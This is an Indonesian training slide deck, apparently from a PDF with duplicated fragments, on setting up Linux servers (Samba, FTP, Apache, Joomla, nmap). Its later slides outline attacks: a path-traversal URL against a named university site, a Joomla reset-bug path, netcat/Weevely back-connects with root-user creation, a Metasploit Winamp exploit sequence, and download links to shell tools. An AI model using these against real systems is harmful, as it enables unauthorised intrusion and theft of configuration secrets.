WORKSHOP & PELATIHAN

SUGIARTO,ST

MAKSUD & TUJUAN

• Memotivasi semangat belajar

• Meningkatkan kemampuan bidang jaringan

dan server

• Melatih pengaplikasian ilmu di perkuliahan• Melatih pengaplikasian ilmu di perkuliahan

MATERI

• INSTALASI LINUX (UBUNTU)

• SETTING MODEM

• CEK SISTEM SERVER

• INSTALASI SERVER WEB, FTP, SAMBA• INSTALASI SERVER WEB, FTP, SAMBA

• INSTALASI SCANNING TOOLS

• APLIKASI WEB SEDERHANA

• ANALISA SERVER

• HACKING SERVER LINUX

INSTALASI LINUX

• Booting CD/DVD Room or

Flashdisk

• Jika pakai VM Ware dapat

gunakan file ISOgunakan file ISO

• Ikuti step by step alur

instalasi

• Gunakan nama host dan

admin yang berbeda

INSTALL MODEM

• Jika modem memiliki driver support Linux

maka bisa langsung install. Biasanya file

berupa *DEB.

• Jika modem tidak ada driver support Linux • Jika modem tidak ada driver support Linux

dari defaultnya maka dapat cari driver for

Linux di google.com

• Jika memang tidak ditemukan juga maka

dapat menggunakan cara berikut ini

INSTALL MODEM

• Buka command terminal

• Ketik “lsusb”

• sudo ls –al /dev/ttyUSB*

INSTALL MODEM

INSTALL MODEM

• Jika sudah muncul /dev/ttyUSB2 berarti

modem sudah terdeteksi dan langsung dapat

dikoneksikan

• Klik simbol koneksi di sudut kanan atas• Klik simbol koneksi di sudut kanan atas

• Lalu koneksikan

CEK SUBSTANSI SERVER

1. Ceck Kernel Version

Uname –rm

2. Ceck IP / Protocol

3. Ceck root / administrator3. Ceck root / administrator

4. Ceck Service yang ada

5. etc

PENGETAHUAN LINUX DASAR

SINTAX DASAR

• Whoami , uname –a ,uname –rm , id

• Ls , cd , dir , pwd

• Cp, rm ,rmdir

• Date, cal• Date, cal

• Cat, nano, gedit

• Ifconfig ,iwconfig

• Mkdir, chmod

• Tar, unzip, unrar

INSTALASI SAMBA SERVER

• Merupakan layanan sharing data ataudokumen. Tahapan instalasi samba server adalah:

• Buka terminal, ketik : sudo apt-get install • Buka terminal, ketik : sudo apt-get install samba atau kalau dalam distro yang lain makaharus disesuaiakan dengan sintax karakterdalam eksekusinya.

• Restart samba dengan perintah:

• /etc/init.d/samba restart

FTP SERVER

• FTP atau file transfer protocol merupakan fasilitas/mediayang diperuntukaan dalam peng-uplod-an atau pundownload semacam media sharing data naming dapatsecara online via broser dengan mengakses halaman/pageftp://[alamat_domain_atau_ip]

• Instalasi FTP server• Instalasi FTP server

• Buka synaptic manager lalu mark pada bagian proftpd,atau bisa juga dengan perintah Shell: apt-get installproftpd

• Restart: /etc/init.d/proftpd

• Jika ingin mengganti port dapat mengubah pada file/etc/proftpd/proftpd.conf lalu sinkron-kan dengan fileports.conf

WEBSERVER

1. Jika melalui synaptic packet manager maka Markbagian “apache2”

2. Restart apache dengan ketik /etc/init.d/apache2restart

3. Setting file /etc/apache2/ports.conf dengan editor(vi/pico/gedit) jiika akan mengganti port web server,

3. Setting file /etc/apache2/ports.conf dengan editor(vi/pico/gedit) jiika akan mengganti port web server,tapi jika ingin menggunakan default yakni port 80 makabiarkan saja tidak perlu disetting.

4. Jika ingin mengubah posisi file dokumen web, dapatmengedit file etc/apache2/sites-available/default laluedit/ganti dibagian DocumentRoot /VAR/WWW gantisesuai posisi yang diinginkan

5. Untuk alasan keamanan, lebih baik ganti opsi

“ServerSignature on” menjadi “ServerSignature off”

6. Install modul php dengan ketik : sudo apt-get install php5

7. Berikutnya adalah menginstall database mysql, dpat

melalui synaptic packet manager dengan Mark pada

bagian: libapache2-mod-auth-mysql

8. Selanjutnya instalasi paket konektor PHP5 dan MySQL8. Selanjutnya instalasi paket konektor PHP5 dan MySQL

melalui synaptic packet manager dengan Mark pada

bagian: php5-mysql

9. Ketik gedit /etc/php5/apache2/php.ini ,cari baris dengan

kata ;extension=mysql.so hilangkan tanda titik

komanya.

10. Restart mysql dengan perintah /etc/init.d/apache2

restart

11. Install PHPMYADMIN dengan cara Mark pada

synaptic packet manager pada bagian “phpmyadmin”

12. Ketik gedit /etc/apache2/apache2.conf buat alias

baru bernama “phpmyadmin” dan diarahkan ke/usr/share/phpmyadmin

Alias /phpmyadmin “/usr/share/phpmyadmin/”Alias /phpmyadmin “/usr/share/phpmyadmin/”

<Directory “/usr/share/phpmyadmin”>

Options Indexes MultiViews

………………dsb………

13. Untuk mengecek silakan masuk ke mysql dengan

perintah mysql –u root –p atau bisa juga melalui

browser dengan ketik : http://localhost/phpmyadmin

• Web server dengan instalasi paket installer

tambahan (unduhan)

• Paket tambahan ini dapat gunakan XAMPP for

linux, WAMPP for linux, Nginx for linux dan

lain sebagainya. Untuk proses instalasinyalain sebagainya. Untuk proses instalasinya

dapat dibaca pada petunjuk Readme pada

masing-masing paket.

SCANNING TOOLS

• Install NMap

• Buka command terminal

• Ketik “apt-get nmap”

• Atau bisa jug pakai synaptic• Atau bisa jug pakai synaptic

• Bila belum ada synaptic maka install dengan

cara mengetik “apt-get install synaptic” pada

terminal dengan sebelumnya login sebagai

root.

DEVELOP SIMPLE WEB

• Gunakan CMS

• CMS adalah tools pembuatan content website

secara simple dan praktis

• Ada beberapa CMS yang terkenal: Wordpress, • Ada beberapa CMS yang terkenal: Wordpress,

Joomla!, Drupal, Lokomedia

• Pada studi kali ini kita gunakan Joomla!

INSTALASI JOOMLA

• Taruh file install packet pada direktori /var/www

atau jika menggunakan xampp terletak pada

directory /opt/lampp/htdocs

• Buka browser lalu ketik localhost/phpmyadmin• Buka browser lalu ketik localhost/phpmyadmin

• Buat database

• Buka browser ketik localhost/joomla

• Ikuti step by step proses instalasi

ANALISA KEAMANAN SERVER

• Scanning server all port & systems

• Scanning aplication , ex: web

• Find Vulnerability

• Get Exploit• Get Exploit

HACKING WEBSITE [dasar]

1. SQL Injection with tools & without tools

2. XSS

3. RFI (analisting) http://www.stainkudus.ac.id/downlot.php?file=../config/koneksi.phphttp://www.stainkudus.ac.id/downlot.php?file=../config/koneksi.php

4. Etc [pertemuan berikutnya]

Reset Bug Joomla!

index.php?option=com_user&view=reset&layout=confirm

Back Connect

• Netcat

• Weevely

• Eksekusi exploit kerner

• Add user Root• Add user Root

DEMO HACKING WIN 7

• Exploit Winnamp

use exploit/windows/browser/winamp_playlist_unc

set lhost …

set srvhost …

set uripath winamp

exploit

sessions

sessions -i 1....

execute -M -f cmd.exe -i

DOWNLOAD TOOLS

• http://www.4shared.com/zip/cMSTDFC2ce/netcat-071.html

• http://www.4shared.com/file/knncrJrZba/2637.html

• http://www.4shared.com/file/SfCv7w2Tba/2631-• http://www.4shared.com/file/SfCv7w2Tba/2631-2010.html

• http://www.4shared.com/rar/tKOToESIba/SHELL.html

• http://www.4shared.com/rar/MqMhp4Ycba/nc_online.html

TIPS & TRIK

• Ubah password Lamppmysql -u root –p

select user,password,host from mysql.user;

update mysql.user set Password=PASSWORD(‘password-baru’) where

user=’root’; flush privileges;user=’root’; flush privileges;

• Atau

/opt/lampp/lampp security

SEMOGA BERMANFAAT

• Pergunakan kemampuan untuk menolong

sesama

• Ilmu diciptakan untuk kebaikan dan

mempermudah mendapat pahala bukanmempermudah mendapat pahala bukan

untuk mencelakakan

• Amalan yang masih mengalir ketika manusia

telah tiada adalah Ilmu yang bermanfaat

• DIATAS LANGIT MASIH ADA LANGIT

Be The Best By MySelf